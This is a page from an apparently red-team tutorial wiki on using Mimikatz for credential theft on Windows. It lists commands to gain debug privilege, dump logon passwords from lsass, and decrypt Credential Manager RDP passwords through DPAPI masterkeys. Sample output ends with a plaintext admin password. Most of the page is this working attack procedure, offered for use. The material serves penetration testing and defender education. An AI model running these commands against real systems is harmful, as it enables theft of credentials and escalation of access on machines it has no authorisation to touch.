DarthSidious
  • Darth Sidious
  • GETTING STARTED
    • Getting started
    • External network access to Domain Admin
    • Intro to Windows hashes
  • Building a lab
    • Building a lab
    • Preparing Kali
    • Building a small lab
    • Building a lab with ESXI and Vagrant
    • Cuckoo malware analysis lab
  • Initial access
    • Password spraying
    • Initial access through exchange
  • ENUMERATION
    • Powershell
    • BloodHound
    • PowerView
    • Azure enumeration
  • Execution
    • Pass the hash
    • Responder with NTLM relay and Empire
    • DeathStar
    • CrackMapExec
  • Privilege escalation
    • Mimikatz
    • Token Impersonation
    • Juicy Potato
    • ALPC bug 0day
  • Defense evasion
    • Bypassing Applocker and Powershell contstrained language mode
    • From RDS app to Empire shell
    • Stealth
  • OTHER
    • Link encyclopedia
    • Writeups
      • lkylabs v1
    • War stories
      • Domain admin in 30 minutes
  • Credential access
    • Password cracking and auditing
  • Command & Control
    • SILENTTRINITY
Powered by GitBook
On this page
  • Dumping creds from lsass
  • DPAPI method
  1. Privilege escalation

Mimikatz

PreviousCrackMapExecNextToken Impersonation

Last updated 6 years ago

The now very famous tool mimikatz can be among other things used to dump credentials, that is hashes and/or. The latest release of mimikatz can be found as a precompiled binary for Windows on gentilwiki's .

Important note about privilege Running Mimikatz nearly always requires Administrative privileges, preferably NT SYSTEM to run correctly. The privilege module is able to elevate a user from Administrator to SYSTEM. 

mimikatz # privilege::debug
Privilege '20' OK

Dumping creds from lsass

mimikatz # sekurlsa::logonpasswords

DPAPI method

In certain scenarios like RDP jumpstations a user might find it useful to save RDP credentials locally in Windows to prevent having to retype passwords. A common scenario is a regular user with a separate admin privileged account that is used for RDP-ing into other boxes. The passwords are then stored in the Windows credential manager.

Credentials for the manager are usually stored in files in either of the following two directories. Use dir /a to check their contents. C:\Users\username\AppData\Roaming\Microsoft\Credentials C:\Users\username\AppData\Local\Microsoft\Credentials

If both are empty, then credentials are probably not saved in the credential manager.. The files are usually stored as 32 character all caps alphanumerical strings, so something like: ?0DCF46D87F2DCE439DC47AA5F9267462`.

Once you have the file name and path for the credential file, open up mimikatz and do.

mimikatz dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462

This will dump the credential blob which contains what we want to decrypt and the GUID for the masterkey which is required for decryption.

As SYSTEM, we can dump all masterkeys, the ! is very important here. !sekurlsa::dpapi

You should get a 129 character string as masterkey associated with the GUID you found in the previous step.

GUID: {6515c6ef-60cd-4563-a3d5-3d70a6bc699}
masterkey: 76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04

Proceed by using the masterkey to decrypt the credentials. dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462/masterkey:76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04

The username and plaintext password should be printed.

UserName       : LAN\username_adm
CredentialBlob : Sup3rAw3s0m3Passw0rd!

Use vault::list to figure out what boxes the credentials belong to. Often they are to specific servers.

Useful links

Github page
https://github.com/gentilkiwi/mimikatz/wiki/module-~-privilege
https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/